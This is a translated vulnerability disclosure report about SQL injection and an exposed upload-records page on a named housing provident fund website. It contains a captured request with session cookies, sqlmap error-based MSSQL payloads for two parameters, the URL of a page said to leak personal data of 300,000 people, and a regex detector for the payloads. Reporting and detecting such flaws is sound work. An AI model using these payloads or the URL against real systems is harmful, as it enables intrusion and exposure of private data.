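2015-08-17: Details reported to the vendor; awaiting vendor handling
2015-08-19: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details disclosed to core white hats and experts in related fields
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to intern white hats
2015-10-03: Details disclosed to the public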
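Found a SQL injection. File reading has been disabled at the same time, but another spot, the upload records, has not been patched!~~~ Some anti-injection measures are in place; I am not skilled enough to get around them, so I left it at that!~~~
1. Capture the request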
POST http://www.smgjj.com/BusinessConsulting.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.smgjj.com/BusinessConsulting.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.smgjj.com
Content-Length: 7981
Connection: Keep-Alive
Pragma: no-cache
Cookie: _gscbrs_477307201=1; _gscu_477307201=39621761kckh7n12; _gscs_477307201=t39622311hhxnek41|pv:3; ASP.NET_SessionId=j4wpzi45gqjugy45vbyo15rs; DBInformation=DBInformation_T_Information_T_Information.Clicks=,f04afaa5-4f96-48a2-8836-48d535f49909Guest,; SiteFunction=SiteFunction_House=,1208,

__VIEWSTATE=[value omitted]&__EVENTVALIDATION=[value omitted]&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1%24dlsthzdw=&HomePageBottomInfo1%24dlstzfbm=&HomePageBottomInfo1%24dlstqtgjj=&HomePageBottomInfo1%24dlstqtwz=&btnSearch.x=33&btnSearch.y=14
The txtNum and txtName parameters are injectable.
sqlmap identified the following injection points with a total of 2308 HTTP(s) requests:
---
Place: POST
Parameter: txtNum
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=[value omitted]&__EVENTVALIDATION=[value omitted]&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2&dlstRange=2&txtNum=1' AND 7297=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (7297=7297) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(113))) AND 'iMLY'='iMLY&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14

Place: POST
Parameter: txtName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=[value omitted]&__EVENTVALIDATION=[value omitted]&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2' AND 3919=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (3919=3919) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(113))) AND 'zQNC'='zQNC&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: txtName, type: Single quoted string (default)
[1] place: POST, parameter: txtNum, type: Single quoted string
[q] Quit
> 0
[15:44:54] [INFO] testing Microsoft SQL Server
[15:44:54] [INFO] confirming Microsoft SQL Server
[15:44:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
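After that I ran into some problems retrieving information, so I did not continue.
2. The record files can be read, exposing the ID card numbers, mobile numbers and work information of more than 300,000 people. The address is one that has already been reported before: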
http://www.smgjj.com/database/DataInput.aspx
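The uploaded record files can be retrieved; they contain a large amount of ID card numbers, mobile numbers, work information, home addresses and even housing provident fund contribution information!~~~
As above.
Filter the input, fix it, and check the access permissions!~~~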
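As an added example (not part of the original report and not the site's own code), the following Python check flags the error-based MSSQL probe shape that sqlmap reported against txtName and txtNum in step 1 when it shows up in a logged POST body. The record layout, timestamps and sample values are constructed assumptions; the field names come from the captured request.

```python
import re
from urllib.parse import parse_qsl, urlencode

# ASP.NET state fields are base64 blobs, not user-typed search input; skip them.
FRAMEWORK_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION"}

# Rule shapes follow the error-based MSSQL payload in the sqlmap output above.
RULES = [
    ("convert-int-subquery", re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I)),
    ("char-concat-chain", re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){3,}", re.I)),
    ("quote-then-boolean", re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=", re.I)),
]

def scan_form_body(body):
    """Return {field: [rule names]} for each URL-decoded form field that matches."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in FRAMEWORK_FIELDS:
            continue
        matched = [rule for rule, rx in RULES if rx.search(value)]
        if matched:
            hits.setdefault(name, []).extend(matched)
    return hits

def triage(records):
    """records: iterable of (timestamp, path, body). Return only the flagged ones."""
    flagged = []
    for ts, path, body in records:
        hits = scan_form_body(body)
        if hits:
            flagged.append((ts, path, sorted(hits)))
    return flagged

# Constructed sample records (not captured traffic); field names are from the report.
BASE_FIELDS = {"__VIEWSTATE": "constructed", "txtkey": "1", "drpSearch": "0",
               "txtStart": "2012-08-15", "txtEnd": "2015-08-15", "dlstRange": "2"}
PROBE_VALUE = ("2' AND 3919=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(120)"
               "+CHAR(100)+CHAR(113))) AND 'zQNC'='zQNC")
SAMPLE_RECORDS = [
    ("2015-08-15T15:40:01", "/BusinessConsulting.aspx",
     urlencode({**BASE_FIELDS, "txtName": "2", "txtNum": "1"})),
    ("2015-08-15T15:44:50", "/BusinessConsulting.aspx",
     urlencode({**BASE_FIELDS, "txtName": PROBE_VALUE, "txtNum": "1"})),
]

if __name__ == "__main__":
    for ts, path, fields in triage(SAMPLE_RECORDS):
        print(ts, path, "suspicious fields:", ", ".join(fields))
```

A check like this helps triage logs; the fix itself is binding txtName and txtNum as query parameters on the server side.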
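Severity: High
Vulnerability Rank: 12
Confirmed: 2015-08-19 10:10
CNVD confirmed and reproduced the reported situation and has passed it through CNCERT to the Fujian branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet.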